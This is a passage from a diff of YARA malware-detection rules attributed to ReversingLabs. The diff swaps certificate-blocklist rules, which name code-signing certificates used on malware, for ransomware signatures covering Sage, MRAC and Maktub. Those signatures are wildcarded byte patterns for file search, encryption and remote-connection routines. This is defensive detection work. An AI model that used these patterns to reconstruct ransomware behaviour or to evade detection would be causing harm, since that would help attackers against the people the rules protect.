55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 10 8B 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B + 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 1D 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 E8 + ?? ?? ?? ?? 8B E5 5D C2 ?? ?? + } + $dd_acquirecontext = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 0B 8B 45 ?? 0D ?? ?? ?? ?? 89 45 ?? C7 45 ?? + ?? ?? ?? ?? 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? ?? + ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 39 8B 45 ?? 83 C8 ?? 50 6A ?? 8B 4D + ?? 51 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 1A 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? + 85 C0 75 02 EB 0E 6A ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 9D 8B 45 ?? 8B E5 5D C2 ?? ?? + } + $dd_mrwhite = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 64 01 00 00 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 12 83 3D ?? ?? ?? ?? ?? 74 09 83 3D ?? ?? ?? ?? ?? 75 05 E9 13 + 01 00 00 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 75 05 E9 F0 00 00 00 8B 95 + ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 + 05 E9 C0 00 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 09 83 BD ?? ?? ?? ?? ?? 73 05 E9 9B + 00 00 00 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 75 02 EB 72 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 02 83 C0 ?? 3B 85 ?? ?? ?? ?? 76 02 EB 51 8B 8D ?? + ?? ?? ?? 83 39 ?? 74 3E 0F B7 95 ?? ?? ?? ?? 83 FA ?? 75 32 8B 85 ?? ?? ?? ?? 8B 08 51 8B 95 ?? ?? ?? ?? 83 C2 ?? 52 6A + ?? 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 33 C0 0F 85 CD FE FF FF 8D 8D + ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ?? + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AFVIMPEX SRL" and pe.signatures[i].serial=="7d:f2:df:ed:47:c6:fd:65:42:13:18:47:cf:fb:c1:02" and 1567036800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($dd_ep at pe.entry_point) and $dd_hash and $dd_getkey and $dd_destroykey and $dd_importkey and $dd_decrypt and $dd_encrypt and $dd_provparam and $dd_acquirecontext and $dd_mrwhite } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_74Fedf0F8398060Fa8378C6D174465C8 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sage : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sage ransomware." author = "ReversingLabs" - id = "eea46214-d0f5-5e92-b678-4a1df09025ce" - date = "2023-11-08" - modified = "2023-11-08" + id = "81f4c666-93f9-51bb-8dda-431ef7a81b74" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3378-L3394" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "406821c7990f05fdad91704f6418304f53dd4800bc4b41912177a1695858fade" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sage.yara#L1-L77" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "69079b7176050096cdbaaaff30dd0359366b3a6a74e8bc17db348794388f71ba" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sage" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection = { + 83 EC ?? 8B 44 24 ?? 53 55 56 57 8B 7C 24 ?? 8B 77 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? + 8B D8 51 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 89 77 ?? FF 15 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 + ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 56 53 55 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 85 DB 0F + 84 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 BA ?? ?? ?? ?? 66 3B F2 0F 95 C0 48 25 ?? ?? ?? ?? + 50 6A ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8B FF + 8D 54 24 ?? 52 56 FF D3 8D 44 24 ?? 50 8B 44 24 ?? 50 50 57 E8 ?? ?? ?? ?? 83 C4 ?? + 50 56 FF D5 85 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 6A ?? 8D 4C 24 ?? 51 8D 54 + 24 ?? 52 6A ?? 68 ?? ?? ?? ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 56 FF 15 ?? ?? ?? ?? + 53 FF 15 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? + 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 5B 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 04 24 83 + C4 ?? C3 57 E8 ?? ?? ?? ?? 83 C4 + } + $encrypt_files = { + 83 EC ?? 53 8B 1D ?? ?? ?? ?? 55 8B 6C 24 ?? 56 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 + ?? ?? ?? ?? 8D 7D ?? 57 FF D3 8B F0 83 FE ?? 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? + ?? 89 44 24 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B + 4C 24 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 FF D3 8B D8 83 FB ?? 75 ?? + 56 FF 15 ?? ?? ?? ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 54 24 ?? 6A ?? 52 57 + 56 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? 8B E8 FF D6 53 FF D6 85 ED 79 ?? + 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C5 5D 5B 83 C4 ?? C3 57 E8 ?? ?? ?? ?? 8B + F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8B D8 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? + 6A ?? 53 51 EB ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 3B 55 ?? 1B C0 83 C0 ?? 50 51 57 56 56 + E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D8 FF 15 ?? ?? ?? ?? 85 DB 79 ?? 5F 5E 5D 8B C3 5B 83 + C4 ?? C3 57 E8 ?? ?? ?? ?? 8B F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B + D8 53 57 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D 33 + C0 5B 83 C4 ?? C3 + } + $find_files = { + 53 55 8B 2D ?? ?? ?? ?? 56 57 33 FF 57 57 FF D5 8B F0 85 F6 74 ?? 85 FF 74 ?? 57 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 44 36 ?? 50 6A ?? 8B DE E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 57 56 + FF D5 8B F0 3B DE 72 ?? 66 83 3F ?? 8B DF 0F 84 ?? ?? ?? ?? 8B 6C 24 ?? 53 8B FB FF + 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 5C 43 ?? FF D6 85 C0 74 ?? 68 + ?? ?? ?? ?? 57 FF D6 85 C0 74 ?? 57 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 D3 E2 F6 + C2 ?? 74 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 6A ?? 89 06 8D 46 ?? + 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 51 C7 46 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 8D 56 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 55 89 46 ?? E8 ?? ?? ?? + ?? 83 C4 ?? 66 83 3B ?? 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DOCS PTY LTD" and pe.signatures[i].serial=="74:fe:df:0f:83:98:06:0f:a8:37:8c:6d:17:44:65:c8" and 1566172800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3Bd6A5Bba28E7C1Ca44880159Dace237 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_MRAC : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects MRAC ransomware." author = "ReversingLabs" - id = "c80245bd-908a-5b89-92e3-af0dd7bed63a" - date = "2023-11-08" - modified = "2023-11-08" + id = "135c3dc9-bf08-5f00-bade-7054d9f33830" + date = "2022-02-21" + modified = "2022-02-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3396-L3412" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f885c782148947d09133a3cc65319e02204c21d6c6d911b360840f25f37601dc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.MRAC.yara#L1-L69" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "04e8364dc9c726f4bb2d3035e5b7e8dab4cae124b2f047be6f11b865fab557a7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "MRAC" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? + 83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1 + ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ?? + ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? + 8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? + ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 + } + $import_key = { + 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 + ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF + 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F + 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 + ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B + C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A + ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F + B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D + 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84 + DB 74 + } + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF + D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 + F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B + 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TECHNO BEAVERS LIMITED" and pe.signatures[i].serial=="3b:d6:a5:bb:a2:8e:7c:1c:a4:48:80:15:9d:ac:e2:37" and 1563408000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($import_key) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_C04F8F1E00C69E96A51Bf14Aab1C6Ae0 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Maktub : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Maktub ransomware." author = "ReversingLabs" - id = "6513160e-ece5-500b-8b0b-4b8a6e04c0af" - date = "2023-11-08" - modified = "2023-11-08" + id = "23ca4232-77ff-5519-b6b0-ccec6cb35fe1" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3414-L3432" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c2b5ffa305b761b57dd91c0acea0d8f82bec6b7d3608be10a20ea63621f3f3e8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Maktub.yara#L1-L116" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ee3213213e9521f7d19ce6340cd2f98057c22b1188ceefc30c17c18b6ec54e20" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Maktub" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? E8 ?? ?? + ?? ?? 51 8D B3 ?? ?? ?? ?? 8B CB 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 50 8B 43 ?? FF D0 8D + 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + B3 ?? ?? ?? ?? FF D0 85 C0 74 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A + ?? 6A ?? 6A ?? 6A ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D0 85 C0 75 ?? FF 75 ?? 8B 43 + ?? FF D0 5E 33 C0 5B 8B E5 5D C3 A1 ?? ?? ?? ?? 57 8B 7D ?? 85 C0 75 ?? FF 15 ?? ?? + ?? ?? A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? 85 C9 74 + ?? 8B D1 33 C0 C1 E9 ?? F3 AB 8B CA 83 E1 ?? F3 AA 8B 7D ?? B9 ?? ?? ?? ?? 3B FE 76 + ?? 8D 46 ?? 3B F8 73 ?? 8D 57 ?? 8D 70 ?? 8B FF 8A 06 8D 52 ?? 88 42 ?? 8D 76 ?? 49 + 75 ?? EB ?? 8B D7 2B D6 8A 06 8D 76 ?? 88 44 32 ?? 49 75 ?? E8 ?? ?? ?? ?? 89 83 ?? + ?? ?? ?? 8D 4F ?? 8B 83 ?? ?? ?? ?? 89 47 ?? FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 8D 45 ?? FF 75 ?? 50 8B 43 ?? 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 85 C0 75 ?? A1 + ?? ?? ?? ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? + ?? ?? FF 75 ?? 8B 43 ?? FF D0 5F 5E 33 C0 5B 8B E5 5D C3 FF 75 ?? 8D 45 ?? 57 50 E8 + ?? ?? ?? ?? 50 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? + ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? FF + 75 ?? 8B 43 ?? FF D0 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 + } + $search_files = { + 55 8B EC 83 EC ?? 53 56 57 8B F9 68 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 0F 84 + ?? ?? ?? ?? 8B 47 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? + FF D0 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4F ?? 8D 45 ?? 50 0F 57 C0 53 66 0F 13 45 + ?? FF D1 85 C0 0F 84 ?? ?? ?? ?? 8B 75 ?? 8B C6 0B 45 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF + 72 ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? + 8B 55 ?? 8D 4A ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? FF 70 ?? 50 FF 31 8D 4D ?? E8 ?? ?? + ?? ?? 8B 45 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? + FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 75 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? 85 C0 + 7C ?? 7F ?? 81 FE ?? ?? ?? ?? 72 ?? 50 8B 45 ?? 56 53 8B 1D ?? ?? ?? ?? 33 F6 51 8D + 48 ?? 89 65 ?? 39 31 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 51 33 F6 89 65 ?? 89 + 01 8B 45 ?? 39 70 ?? 8D 48 ?? 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 89 01 8B CF + E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 E9 ?? ?? ?? ?? 8B 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A + ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 89 45 ?? 83 F8 ?? 75 ?? 8B 47 ?? 53 FF D0 33 FF E9 + ?? ?? ?? ?? 51 8D 87 ?? ?? ?? ?? 8B CF 50 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? + ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 + ?? ?? ?? ?? ?? 51 FF 75 ?? 50 8B 47 ?? 53 FF D0 85 C0 75 ?? 8B 4D ?? E9 ?? ?? ?? ?? + 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? + ?? ?? ?? ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 85 C0 74 ?? E8 ?? ?? ?? ?? + 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 + 85 C0 75 ?? 8B 4D ?? EB ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? + FF 75 ?? FF D0 85 C0 75 ?? 8B 4D ?? EB ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF + 75 ?? 8B 45 ?? 50 FF 75 ?? 8B 47 ?? FF D0 8B 4D ?? 85 C0 74 ?? 8B 45 ?? 3B 45 ?? 74 + ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 FF 75 ?? 8B 47 ?? FF D0 + 8B 47 ?? 56 FF D0 33 FF E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 FF 75 + ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? + ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? + ?? ?? ?? 6A ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 45 + ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 75 ?? + 8B 47 ?? 56 FF D0 33 FF EB ?? BF ?? ?? ?? ?? 83 C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? + 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 1D ?? ?? + ?? ?? 56 6A ?? 50 FF D3 EB ?? 8B 47 ?? 53 FF D0 33 FF 8B 1D ?? ?? ?? ?? 8B 75 ?? 83 + C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? + ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 50 FF D3 8B C7 5F 5E 5B 8B E5 5D C2 + } + $previous_encrypt_files = { + 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8D 4D + ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF + 77 ?? FF D3 8D 4D ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 + 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 + 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? 